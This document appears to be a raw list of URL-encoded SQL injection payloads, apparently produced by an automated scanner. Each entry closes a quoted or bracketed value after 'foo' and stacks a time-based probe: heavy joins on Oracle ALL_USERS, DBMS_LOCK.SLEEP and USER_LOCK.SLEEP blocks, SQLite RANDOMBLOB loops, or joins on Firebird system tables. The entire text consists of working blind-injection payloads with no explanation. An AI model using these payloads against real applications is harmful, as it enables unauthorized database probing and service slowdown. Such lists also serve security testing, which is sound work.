foo%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%25%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%25%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%25%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%25%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%00%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%00%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%29%20WHERE%204684%3D4684%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%22%29%20WHERE%202212%3D2212%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%29%20WHERE%201294%3D1294%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%20WHERE%201751%3D1751%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%22%20WHERE%206080%3D6080%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%20WHERE%201897%3D1897%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%7C%7C%28SELECT%20%27fqbM%27%20FROM%20DUAL%20WHERE%205372%3D5372%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%7C%7C%28SELECT%20%27aXpE%27%20WHERE%207919%3D7919%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%2B%28SELECT%20DPPG%20WHERE%204848%3D4848%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%2B%28SELECT%20%27BvZn%27%20WHERE%209568%3D9568%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%22%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%22%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%22%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%22%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%22%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%22%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%25%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%25%27%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%25%27%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%25%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%00%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%00%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%20WHERE%206651%3D6651%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%22%29%20WHERE%205518%3D5518%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%29%20WHERE%205095%3D5095%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%20WHERE%206729%3D6729%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%22%20WHERE%203606%3D3606%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%20WHERE%209570%3D9570%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%7C%7C%28SELECT%20%27ukZT%27%20FROM%20DUAL%20WHERE%205008%3D5008%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%7C%7C%28SELECT%20%27ffBi%27%20WHERE%202159%3D2159%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%2B%28SELECT%20CIXB%20WHERE%201394%3D1394%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%2B%28SELECT%20%27Gteo%27%20WHERE%204796%3D4796%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%27%20IN%20BOOLEAN%20MODE%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- foo%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%22%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%22%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%22%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%22%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%22%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%22%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%25%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%25%27%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%25%27%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%25%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%00%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%00%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%29%20WHERE%207821%3D7821%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%22%29%20WHERE%201553%3D1553%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%29%20WHERE%205144%3D5144%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%20WHERE%206896%3D6896%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%22%20WHERE%205266%3D5266%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%20WHERE%208999%3D8999%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%7C%7C%28SELECT%20%27zwuI%27%20FROM%20DUAL%20WHERE%201645%3D1645%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%7C%7C%28SELECT%20%27GBFV%27%20WHERE%209185%3D9185%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%2B%28SELECT%20yspK%20WHERE%209185%3D9185%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%2B%28SELECT%20%27xoaP%27%20WHERE%205152%3D5152%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%27%20IN%20BOOLEAN%20MODE%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- foo%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%25%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%25%27%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%25%27%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%25%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%00%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%00%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%29%20WHERE%205405%3D5405%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%29%20WHERE%203238%3D3238%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%29%20WHERE%202671%3D2671%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%20WHERE%206389%3D6389%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%20WHERE%208007%3D8007%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%20WHERE%202043%3D2043%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%7C%7C%28SELECT%20%27LrQl%27%20FROM%20DUAL%20WHERE%209815%3D9815%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%7C%7C%28SELECT%20%27soDa%27%20WHERE%203754%3D3754%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%2B%28SELECT%20UAzG%20WHERE%208599%3D8599%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%2B%28SELECT%20%27BKlJ%27%20WHERE%201309%3D1309%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%25%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%25%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%25%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%25%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%00%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%00%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%29%20WHERE%202012%3D2012%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%22%29%20WHERE%206144%3D6144%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%29%20WHERE%202040%3D2040%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%20WHERE%208865%3D8865%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%22%20WHERE%201487%3D1487%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%20WHERE%202046%3D2046%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%7C%7C%28SELECT%20%27oXSe%27%20FROM%20DUAL%20WHERE%209147%3D9147%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 